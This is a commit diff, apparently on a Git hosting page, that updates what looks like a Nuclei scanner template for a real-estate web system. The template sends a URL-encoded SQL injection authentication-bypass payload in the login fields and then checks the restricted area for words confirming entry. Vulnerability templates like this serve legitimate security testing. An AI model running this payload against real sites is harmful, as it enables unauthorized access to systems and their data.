fix matcher
parent
519d77e5d4
commit
2a7ac6eb8a
|
@ -16,18 +16,23 @@ info:
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /restrito/login HTTP/1.1
|
POST /restrito/login/sub/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
|
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /restrito/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Sistema Web para Imobiliárias e Corretores"
|
- "Banner"
|
||||||
- "Área Restrita"
|
- "Construtoras"
|
||||||
condition: and
|
condition: and
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue